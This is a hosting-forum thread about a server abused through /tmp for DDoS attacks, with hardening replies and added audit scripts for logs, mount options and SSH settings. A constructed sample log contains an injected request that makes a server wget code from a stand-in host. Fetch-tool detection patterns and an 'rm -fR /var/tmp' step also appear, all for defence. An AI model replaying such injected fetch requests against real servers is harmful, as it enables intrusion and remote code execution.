  1. #1

    /tmp used to DDoS

    Hey guys,
    I have a server that keeps on being used to launch attacks on other people.
    What the person/script is doing is using /tmp, possibly to run a script that sends out many, many packets.
    Nocster then just shuts off my server and we co-operate with them to try to fix it. They have tried changing the permissions on /tmp, but then it seems like it happens again.
    It has happened almost 6 times now, and they are starting to get angry!!

    Any suggestions?


  2. #2
    Join Date
    Mar 2003
    California USA
    for files in /usr/local/apache/domlogs/*; do grep "wget" "$files"; done
    might help find where they are getting in. I suggest hiring a company to check out your server and do a security audit on it.

    are just some of them. Search around the forums for companies good with security.
    Steven Ciaburri | Proactive Linux Server Management -
    Managed Servers (AS62710), Server Management, and Security Auditing.
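
Steven's one-liner above greps every domlog for the string wget. The script below is an added example, not from this thread, that applies the same idea to a constructed Apache-format log (the addresses and requests are made up) and restricts the match to the request field so that a browser's User-Agent string does not trip it; it lists the matching lines and the client addresses behind them.

```sh
#!/bin/sh
# Added example (not from the thread): scan Apache access logs for requests
# that carry fetch-tool names, the pattern the grep loop in post #2 looks for.

# Constructed sample log (not a real domlog) so the script runs offline.
make_sample_log() {
  cat > "$1" <<'EOF'
203.0.113.5 - - [10/Aug/2003:14:02:11 -0500] "GET /index.php HTTP/1.1" 200 3412 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Aug/2003:14:02:19 -0500] "GET /modules.php?file=wget%20http://198.51.100.7/x HTTP/1.0" 200 211 "-" "Wget/1.8"
203.0.113.9 - - [10/Aug/2003:14:03:40 -0500] "GET /images/logo.gif HTTP/1.1" 304 0 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2003:14:03:58 -0500] "GET /modules.php?file=curl%20http://198.51.100.7/y HTTP/1.0" 200 211 "-" "-"
EOF
}

# Print log lines whose request field (the first quoted field) mentions a
# fetch tool. Anchoring on the request avoids false hits from User-Agent
# strings such as "Wget/1.8" in the last field.
scan_fetch_requests() {
  grep -E '"[[:upper:]]+ [^"]*(wget|curl|fetch|lynx)[^"]*HTTP/[0-9.]+"' "$1"
}

# Distinct client addresses behind the matches, as a quick triage list.
fetch_request_sources() {
  scan_fetch_requests "$1" | cut -d' ' -f1 | sort -u
}

# Number of matching request lines.
fetch_request_count() {
  scan_fetch_requests "$1" | wc -l | tr -d ' '
}

# Stand-alone run over the constructed sample.
log=$(mktemp)
make_sample_log "$log"
echo "matching requests: $(fetch_request_count "$log")"
fetch_request_sources "$log"
rm -f "$log"
```

To run it over real domlogs, loop over the files as in the post and pass each one to scan_fetch_requests; prefix the output with the file name if you need to know which site the request hit.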

  3. #3
    bobcares
    Join Date
    Nov 2001
    India, US, Germany
    Mount /tmp and make it non-executable.

    Have a nice day

    A student once asked his teacher, "Master, what is enlightenment?"
    The master replied, "When hungry, eat. When tired, sleep. When you need care, come to bobcares...."

  4. #4
    Join Date
    Dec 2001
    Franklin, TN, USA
    How do you know for sure it's /tmp?

    Make sure /var/tmp is also mounted as noexec.
    Linux. Problems Solved. | Built for the Hosting Industry
    Server Management. Helpdesk Management. Business Management.
    ( AcuNett, Est. 15 Years, RateLobby 5 Stars )

  5. #5
    Join Date
    May 2002
    Originally posted by AcuNett
    Make sure /var/tmp is also mounted as noexec.
    Often an idea to symlink /var/tmp to /tmp:

    rm -fR /var/tmp; ln -s /tmp /var/tmp
    Clook Internet -
    Fully managed UK based webhosting provider
    Est 2002, 24/7 phone support, all the bells and whistles!
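
Posts #3, #4 and #5 all come down to /tmp and /var/tmp being separate filesystems mounted noexec (and nosuid). The script below is an added example, not from this thread, that audits that from a /proc/mounts-style listing; the listing is constructed here (/tmp done right, /var/tmp still a plain directory on the root filesystem) so it runs offline. Point it at the real /proc/mounts to check a live box.

```sh
#!/bin/sh
# Added example (not from the thread): audit mount options for the temp
# directories the replies above say should be noexec,nosuid.

# Constructed snapshot in /proc/mounts format:
#   device mountpoint fstype options dump pass
# /tmp is a separate filesystem with the right options; /var/tmp is not a
# mountpoint at all, so it inherits exec from / and fails the audit.
make_sample_mounts() {
  cat > "$1" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda5 /tmp ext3 rw,noexec,nosuid,nodev 0 0
/dev/sda6 /home ext3 rw,nosuid 0 0
none /proc proc rw 0 0
EOF
}

# Print the option string for a mountpoint; fail if it is not a mountpoint.
mount_opts() {
  awk -v mp="$2" '$2 == mp { print $4; found = 1 } END { exit !found }' "$1"
}

# Succeed only when the path is its own mount carrying every option in the
# comma-separated list $3.
mount_has_opts() {
  opts=$(mount_opts "$1" "$2") || return 1
  for want in $(printf '%s' "$3" | tr ',' ' '); do
    case ",$opts," in
      *",$want,"*) ;;
      *) return 1 ;;
    esac
  done
  return 0
}

# Report each temp directory; exit status 1 if any of them fails.
audit_tmp_mounts() {
  rc=0
  for mp in /tmp /var/tmp; do
    if mount_has_opts "$1" "$mp" noexec,nosuid; then
      echo "OK   $mp ($(mount_opts "$1" "$mp"))"
    else
      echo "FAIL $mp: not a separate filesystem with noexec,nosuid"
      rc=1
    fi
  done
  return $rc
}

# Stand-alone run over the constructed snapshot. On a real system use:
#   audit_tmp_mounts /proc/mounts
m=$(mktemp)
make_sample_mounts "$m"
audit_tmp_mounts "$m" || echo "fix: give the failing path its own partition (or the symlink from post #5) with noexec,nosuid in /etc/fstab"
rm -f "$m"
```

If you take the symlink route from post #5, /var/tmp will not appear in /proc/mounts at all; check the target (/tmp) instead, since the options of the mount the link resolves to are what apply.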

  6. #6
    Join Date
    Jul 2003
    Nothing but, net
    If this has happened 6 times, you may want to hire a qualified system administrator to manage your box for you.

  7. #7

    Look at doing the following (after you wipe the system, restore the os, and restore from a backup made prior to the hack):

    * Disable telnet.
    * Limit SSH access to specific IP addresses.
    * Disable direct root login.
    * Remove unnecessary packages / software.
    * Harden the kernel against synflood and basic DOS attacks.
    * Remove common user access to compilers and fetching software (wget, fetch, lynx, etc.).
    * Ensure /tmp is in its own partition with noexec, nosuid.
    * Ensure kernel and software are up to date.
    * Remove unnecessary users and groups.
    * Install chkrootkit, logwatch, tripwire.
    * Install a firewall, and port scan detector.
    * For Apache servers, install mod_security and configure for use with FrontPage, PHPMyAdmin, Site Studio, and other common applications.
    * Secure DNS Servers
    * Utilize firewall automation to keep brute-force FTP, syn floods, mail bombs, and out-of-network trojaned servers from impacting your servers.

    It is important to note that security is an ongoing venture. Even if you were to take all of the steps listed above, you would still have a regular routine of review, update, research, patch, etc.

    Thank you.
    Peter M. Abraham
    LinkedIn Profile
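
Two items on Peter's list, "disable direct root login" and "limit SSH access", can be checked against sshd_config without guessing. The script below is an added example, not from this thread; it reads the effective value of a keyword the way sshd does (first non-comment occurrence wins) and audits a weak and a hardened config, both constructed here. It does not understand Match blocks, so on newer OpenSSH treat its answer for a keyword that also appears under Match as the global default only.

```sh
#!/bin/sh
# Added example (not from the thread): audit sshd_config for the root-login
# and access-limit items in post #7.

# Constructed sample: a stock-looking config with root login still allowed.
make_weak_sshd_config() {
  cat > "$1" <<'EOF'
Port 22
Protocol 2,1
#PermitRootLogin no
PermitRootLogin yes
PasswordAuthentication yes
EOF
}

# Constructed sample: what the audit expects to see. AllowUsers takes the
# user@host form, which limits both the account and where it may come from.
make_hardened_sshd_config() {
  cat > "$1" <<'EOF'
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
AllowUsers admin@192.0.2.10
EOF
}

# Effective value of a keyword: sshd uses the first non-comment occurrence,
# and keywords are case-insensitive. Prints nothing if the keyword is unset.
sshd_effective() {
  awk -v key="$(printf '%s' "$2" | tr '[:upper:]' '[:lower:]')" '
    /^[[:space:]]*#/ || NF < 2 { next }
    tolower($1) == key { print $2; exit }
  ' "$1"
}

# Exit 0 only if root login is off, protocol 1 is off, and access is limited.
audit_sshd() {
  fails=0
  val=$(sshd_effective "$1" PermitRootLogin | tr '[:upper:]' '[:lower:]')
  if [ "$val" != "no" ]; then
    echo "FAIL PermitRootLogin=${val:-unset} (want no)"; fails=$((fails + 1))
  fi
  val=$(sshd_effective "$1" Protocol)
  if [ "$val" != "2" ]; then
    echo "FAIL Protocol=${val:-unset} (want 2)"; fails=$((fails + 1))
  fi
  val=$(sshd_effective "$1" AllowUsers)
  if [ -z "$val" ]; then
    echo "FAIL no AllowUsers restriction (limit accounts and source hosts)"; fails=$((fails + 1))
  fi
  [ "$fails" -eq 0 ] && echo "OK   $1 passes"
  [ "$fails" -eq 0 ]
}

# Stand-alone run over both constructed configs. On a real system use:
#   audit_sshd /etc/ssh/sshd_config
w=$(mktemp); h=$(mktemp)
make_weak_sshd_config "$w"; make_hardened_sshd_config "$h"
audit_sshd "$w" || true
audit_sshd "$h" || true
rm -f "$w" "$h"
```

AllowUsers in sshd is only half of "limit SSH access to specific IP addresses"; the firewall rule for port 22 (item "install a firewall" on the same list) is the other half, and the two should agree.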

  8. #8
    Join Date
    Jul 2003
    The hack you are seeing is done via PHP apps like PHP-Nuke

    I watched a server get hacked in real time, and they were downloading shell scripts and tarballs of DoS engines and more toys from a remote server and then executing the script and other toys as the user that the web server is running as, 'nobody'.

    I have found all sorts of backdoor scripts, eggdrops, bnc and other nasty stuff. One set of files I looked over was also infected with a virus that would infect all the 'ELF' binaries on the server.

    After all of the files have been installed in /tmp, an eggdrop bot will join an IRC channel and wait for commands on who to attack next, or they are used for other illegal activities like helping distribute warez or stolen information.

    Some links.

    I still have the tarballs from one of the servers that got taken if anyone wants to see the various crap they use.
